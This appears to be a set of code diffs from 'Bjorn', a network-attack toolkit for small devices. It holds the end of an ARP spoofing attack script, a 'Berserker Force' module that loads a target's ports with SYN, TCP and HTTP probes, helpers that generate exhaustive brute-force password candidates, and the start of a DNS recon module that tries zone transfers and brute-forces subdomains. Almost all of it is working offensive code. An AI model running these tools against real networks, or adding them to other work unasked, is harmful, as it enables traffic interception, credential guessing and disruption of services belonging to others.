with open(SETTINGS_FILE, 'w') as file:
json.dump(settings, file)
print(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
print(f"Failed to save settings: {e}")
def load_settings():
"""Loads the ARP spoofing settings from a JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as file:
return json.load(file)
except Exception as e:
print(f"Failed to load settings: {e}")
return {}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP Spoofing Attack Script")
parser.add_argument("-t", "--target", help="IP address of the target device")
parser.add_argument("-g", "--gateway", help="IP address of the gateway")
parser.add_argument("-i", "--interface", default=conf.iface, help="Network interface to use (default: primary interface)")
parser.add_argument("-d", "--delay", type=float, default=2, help="Delay between ARP packets in seconds (default: 2 seconds)")
args = parser.parse_args()
# Load saved settings and override with CLI arguments
settings = load_settings()
target_ip = args.target or settings.get("target")
gateway_ip = args.gateway or settings.get("gateway")
interface = args.interface or settings.get("interface")
delay = args.delay or settings.get("delay")
if not target_ip or not gateway_ip:
print("Target and Gateway IPs are required. Use -t and -g or save them in the settings file.")
exit(1)
# Save the settings for future use
save_settings(target_ip, gateway_ip, interface, delay)
# Execute the attack
spoof = ARPSpoof(target_ip=target_ip, gateway_ip=gateway_ip, interface=interface, delay=delay)
spoof.execute()
shared_data = SharedData()
try:
spoofer = ARPSpoof(shared_data)
logger.info("ARPSpoof module ready.")
except Exception as e:
logger.error(f"Error: {e}")

View File

@@ -1,315 +1,617 @@
# Resource exhaustion testing tool for network and service stress analysis.
# Saves settings in `/home/bjorn/.settings_bjorn/berserker_force_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to test.
# -p, --ports Ports to test (comma-separated, default: common ports).
# -m, --mode Test mode (syn, udp, http, mixed, default: mixed).
# -r, --rate Packets per second (default: 100).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stress).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
import os
import json
import argparse
from datetime import datetime
import logging
import threading
import time
import queue
import socket
import os
import random
import requests
from scapy.all import *
import psutil
from collections import defaultdict
import socket
import ssl
import statistics
import time
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
from scapy.all import IP, TCP, sr1, conf as scapy_conf # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce"
b_module = "berserker_force"
b_enabled = 0
b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
b_category = "stress"
b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stress"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "berserker_force_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 80, 443, 445, 3306, 3389, 5432]
b_tags = ["stress", "availability", "resilience"]
b_args = {
"mode": {
"type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: even a refused connection or error page counts
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except URLError:
return None
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
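As a worked check of the degradation formula above (illustrative numbers, mirroring `_degradation_pct`):

```python
def degradation_pct(baseline_mean: float, post_mean: float) -> float:
    # Percentage increase from baseline to post-stress mean; positive = slower.
    if baseline_mean <= 0:
        return 0.0
    return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)

# A service whose mean connect time rises from 20 ms to 35 ms degraded by 75%.
print(degradation_pct(0.020, 0.035))  # 75.0
```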
# -------------------- Main class ----------------------------------------------
class BerserkerForce:
"""Service resilience tester -- orchestrator-compatible Bjorn action."""
def __init__(self, shared_data):
self.shared_data = shared_data
# ------------------------------------------------------------------ #
# Phase helpers #
# ------------------------------------------------------------------ #
def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Gather target ports from the port argument, row data, or DB hosts table."""
ports: List[int] = []
# 1) Explicit port argument
try:
p = int(port) if str(port).strip() else None
if p:
ports.append(p)
except Exception:
pass
# 2) Row data (Ports column, semicolon-separated)
if not ports:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
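The token handling in `_resolve_ports` (semicolon or comma separators, `80/tcp` suffixes, de-dup with a 20-port cap) can be exercised in isolation:

```python
def parse_port_tokens(ports_txt: str, cap: int = 20) -> list:
    # Accept "80/tcp; 443, 8080"-style strings; de-duplicate, keep order, cap length.
    seen, out = set(), []
    for tok in ports_txt.replace(",", ";").split(";"):
        tok = tok.strip().split("/")[0]  # handle "80/tcp"
        if tok.isdigit() and int(tok) not in seen:
            seen.add(int(tok))
            out.append(int(tok))
    return out[:cap]

print(parse_port_tokens("80/tcp; 443, 8080; 80"))  # [80, 443, 8080]
```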
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
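The rate limiting in `_run_stress` reduces to a clamped inverse: the requested rate is forced into `[1, _MAX_RATE]` and the sleep between probes is its reciprocal. A minimal sketch of that arithmetic:

```python
MAX_RATE = 50  # hard probes/s ceiling (RPi guard)

def probe_interval(rate: int, max_rate: int = MAX_RATE) -> float:
    # Clamp the requested rate to [1, max_rate]; sleep this long between probes.
    rate = max(1, min(int(rate), max_rate))
    return 1.0 / rate

print(probe_interval(20))   # 0.05
print(probe_interval(999))  # 0.02
print(probe_interval(0))    # 1.0
```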
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
},
"stress": {
"probes_sent": sr["sent"],
"probes_ok": sr["success"],
"probes_fail": sr["fail"],
"mean_rt_s": round(_safe_mean(sr["times"]), 6),
"stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
"max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
"post_baseline": {
"samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
# Overall summary
total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
)
return {
"summary": {
"ports_tested": len(ports),
"total_probes_sent": total_sent,
"total_probes_ok": total_ok,
"total_probes_fail": total_fail,
"avg_degradation_pct": avg_degradation,
},
"per_port": per_port,
}
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Write the JSON report and return the file path."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as exc:
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
safe_ip = ip.replace(":", "_").replace(".", "_")
filename = f"{safe_ip}_{ts}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
report = {
"tool": "berserker_force",
"version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
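`_save_report`'s filename convention, shown standalone (the default directory here is illustrative):

```python
import os
from datetime import datetime, timezone

def report_path(ip: str, output_dir: str = "data/output/stress") -> str:
    # Filesystem-safe name: dots/colons in the IP become underscores, UTC timestamp appended.
    ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
    safe_ip = ip.replace(":", "_").replace(".", "_")
    return os.path.join(output_dir, f"{safe_ip}_{ts}.json")

print(report_path("192.168.1.10"))
```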
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so the action reads them
sd.berserker_mode = args.mode
sd.berserker_duration = args.duration
sd.berserker_rate = args.rate
act = BerserkerForce(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
result = act.execute(args.ip, args.port, row, "berserker_force")
print(f"Result: {result}")


@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
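The bounded candidate generation above can be sketched in isolation (a standalone helper, not the module's own function, omitting the dedup and mix checks):

```python
import itertools

def bounded_product(charset: str, min_len: int, max_len: int, cap: int) -> list:
    # Enumerate every string of length min_len..max_len over charset,
    # stopping as soon as `cap` candidates exist (the Pi Zero guard).
    out = []
    for ln in range(min_len, max_len + 1):
        for tup in itertools.product(charset, repeat=ln):
            out.append("".join(tup))
            if len(out) >= cap:
                return out
    return out

print(bounded_product("ab", 1, 2, 5))  # ['a', 'b', 'aa', 'ab', 'ba']
```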
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)
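The order-preserving dedup applied to both lists can be illustrated standalone (same idea as `_unique_keep_order`):

```python
def unique_keep_order(items) -> list:
    # First-seen-wins dedup; falsy entries collapse to the empty string.
    seen, out = set(), []
    for raw in items:
        s = str(raw or "")
        if s not in seen:
            seen.add(s)
            out.append(s)
    return out

print(unique_keep_order(["admin", "root", "admin", None]))  # ['admin', 'root', '']
```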


@@ -1,175 +1,837 @@
"""
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
Performs comprehensive DNS intelligence gathering on discovered hosts:
- Reverse DNS lookup on target IP
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
- Zone transfer (AXFR) attempts against discovered nameservers
- Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os
import json
import socket
import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
# ---------------------------------------------------------------------------
# Graceful import for dnspython (socket fallback if unavailable)
# ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
